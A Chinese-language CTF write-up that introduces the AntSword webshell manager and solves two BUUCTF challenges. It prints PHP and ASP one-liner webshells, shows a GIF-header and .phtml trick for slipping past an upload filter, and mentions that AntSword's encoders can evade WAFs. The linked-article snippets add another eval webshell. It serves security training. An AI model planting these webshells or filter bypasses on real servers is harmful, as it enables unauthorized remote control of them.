首页 > 其他分享 >[网络安全]AntSword蚁剑实战解题详析

[网络安全]AntSword蚁剑实战解题详析

时间:2023-05-02 22:25:45浏览次数:48  
标签:详析 网络安全 AntSword 文件 文件格式 木马 上传

免责声明:本文仅分享AntSword渗透相关知识,不承担任何法律责任。
请读者自行安装蚁剑,本文不再赘述。

蚁剑介绍

蚁剑(AntSword)是一款开源的跨平台WebShell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
中国蚁剑的特点主要有如下几点:

1.支持多平台。包括macOS、Linux 32位、Linux 64位、Linux armv7l、Linux arm64、Windows 32位、Windows 64位。
2.完善的文档。中国蚁剑文档地址。
3.多项功能。文件管理功能、虚拟终端功能、数据库管理功能。
4.内置代理功能。支持HTTP、HTTPS、SOCKS4、SOCKS5四种代理协议。使用代理,可以连接处于内网中的Shell、加快连接速度、隐藏自身、与 BurpSuite 等工具配合使用等。
5.编码器和解码器。用于蚁剑客户端和Shell服务端通信时的加密、编码操作,可用于绕过WAF。
6.高扩展性。
    i插件。具有插件仓库,也可以自己开发插件。
    ii自定义编码器和解码器。

蚁剑官方文档


接下来进入解题详析

1 [极客大挑战 2019]Knife

在这里插入图片描述

思路

明显地,输入URL及密码Syc即可。

操作

  1. 输入URL及密码Syc并测试连接

在这里插入图片描述

  1. 添加数据成功后点击文件管理,在根目录找到flag

在这里插入图片描述

2 [极客大挑战 2019] Upload

在这里插入图片描述

文件上传漏洞

文件上传漏洞是指利用网页上传口的一些漏洞,上传诸如一句话木马等带有危险性的文件去进入目标服务器。
文件上传题目,一般都是绕过服务器设下的各种拦截措施上传木马文件,再利用类如菜刀蚁剑等设备连接服务器进行操作。

思路

上传一句话木马文件,使用蚁剑连接服务器。

操作

  1. qiushuo.txt中写入一句话木马,修改文件格式为php并上传。

在这里插入图片描述

回显Not image!,说明文件格式不符。

  1. 将文件格式改为jpg,上传。

在这里插入图片描述回显NO! HACKER! your file included '<?',说明题目对<?进行过滤

  1. 更换一句话木马为<%execute(request("value"))%>

在这里插入图片描述回显Don't lie to me, it's not image at all!!!,说明题目还对图片头进行校验。

  1. 更改图片头

将一句话木马改为:

GIF89a
<script language="php">eval($_POST['qiushuo']);</script> 

上传成功:
在这里插入图片描述

  1. 抓包,修改文件后缀名

由于请求包限制Content-Type为image/jpeg,而image/jpeg文件不可被解析。此时需要绕过后缀,常见绕过后缀的文件格式有php,php3,php4,php5,phtml,pht
尝试修改文件后缀为pht,上传失败。
在这里插入图片描述在尝试php、php3、php4、php5后,将文件名由qiushuo.jpg修改为qiushuo.phtml,回显成功:
在这里插入图片描述

  1. 进入图片保存路径,一般为/upload.filename

找到该文件:在这里插入图片描述得到该文件URL地址。

  1. 连接蚁剑

在这里插入图片描述于根目录找到flag文件:
在这里插入图片描述

总结

以上为[网络安全]AntSword(蚁剑)实战解题详析(入门),以两道CTF题分享AntSword简单使用方法。
后续将分享DVWA之File Upload解题详析。
我是秋说,我们下次见。

标签:详析,网络安全,AntSword,文件,文件格式,木马,上传
From: https://www.cnblogs.com/qiushuo/p/17368405.html

相关文章

  • [网络安全]BurpSuite爆破实战解题详析之BUUCTF Brute 1
    免责声明:本文仅分享AntSword渗透相关知识,不承担任何法律责任。请读者自行安装BurpSuite,本文不再赘述。在用户名和密码都未知的情况下,进行用户名、密码的组合爆破,效率极低。先爆破用户名,再利用得到的用户名爆破密码,将提高爆破速度。BUUCTFBrute1题目操作Burp抓包单独......
  • [网络安全]DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集
    免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。DVWA、BurpSuite请读者自行安装,本文不再赘述。同类文章参考:[网络安全]AntSword(蚁剑)实战解题详析(入门)FileUpload—lowlevel源码中无过滤:上传包含一句话木马<?php@eval($_POST[qiushuo]);?>的文件qiu.php回显......
  • [网络安全]sqli-labs Less-2 解题详析
    往期回顾:[[网络安全]sqli-labsLess-1解题详析](https://blog.csdn.net/2301_77485708/article/details/130410800?spm=1001.2014.3001.5502)判断注入类型GET1and1=1,回显如下:GET1and1=2,没有回显:说明该漏洞类型为整型注入。判断注入点个数GET1orderby3,回显如下:GE......
  • [网络安全]DVWA之Brute Force攻击姿势及解题详析合集
    免责声明:本文仅分享Burp爆破相关知识,不承担任何法律责任。DVWA及Brup请读者自行安装,本文不再赘述。同类文章参考:[网络安全]BurpSuite爆破实战解题详析之BUUCTFBrute1DVWA之BruteForce攻击之lowlevel思路:先爆用户名,再爆密码。抓包后给username添加payload位置添加Bu......
  • [网络安全]sqli-labs Less-3 解题详析
    判断注入类型GET1'and'1'='1,回显如下:GET1'and'1'='2:没有回显,说明该漏洞类型为GET型单引号字符型注入判断注入点个数GET1'orderby2--+,回显如下:由上图可知,sql语法中给$id加上了()猜测后端语句为SELECT*FROMxxwhereid=('$id')故构造GET1')orderby3-......
  • [网络安全]sqli-labs Less-4 解题详析
    判断注入类型GET1"and"1"="1,回显如下:GET1"and"1"="2没有回显,说明该漏洞类型为GET型双引号字符型注入判断注入点个数GET1"orderby3--+由上图可知,sql语法中给$id加上了()猜测后端语句为SELECT*FROMxxwhereid=("$id")故构造GET1')orderby3--+,此时后......
  • [网络安全]sqli-labs Less-5 解题详析
    往期sqli-labs在该博客中,读者可自行浏览。[秋说的博客](https://blog.csdn.net/2301_77485708?spm=1000.2115.3001.5343)该博客实操性较高,请读者`躬身实践`判断注入类型GET1'and'1'='1回显如下:GET1'and'1'='2没有回显,说明该漏洞类型为GET型单引号字符型注入判断注入......
  • [网络安全]DVWA之SQL注入—medium level解题详析
    免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。本文涉及的DVWA应用程序、BurpSuite、sqlmap请读者自行安装,本文不再赘述。SQL注入原理可参考:[网络安全]SQL注入原理及常见攻击方法简析sqlmap注入方式可参考:[网络安全]以留言板项目渗透实例带你入门sqlmap提交用户名后......
  • [网络安全]DVWA之SQL注入—High level解题详析
    免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。DVWA请读者自行安装,本文不再赘述。由于highlevel仅涉及简单攻击知识,本文不再详细解释。建议读者在理解SQL注入原理,熟悉lowlevel、mediumlevel解题姿势后再观看本文。具体原理及姿势参见:[网络安全]DVWA之SQL注入—low......
  • [网络安全]Less-1 GET - Error based - Single quotes - String:基于错误的GET单引号
    判断注入类型GET1and1=2仍有正常回显,说明该漏洞类型不是数字型注入。GET1'and'1'='2没有回显,说明该漏洞类型为字符型注入。判断注入点个数GETid=1'orderby4--+回显UnknownGETid=1'orderby3--+回显如下:说明注入点个数为3个即可构造语句如下-1'unionselect......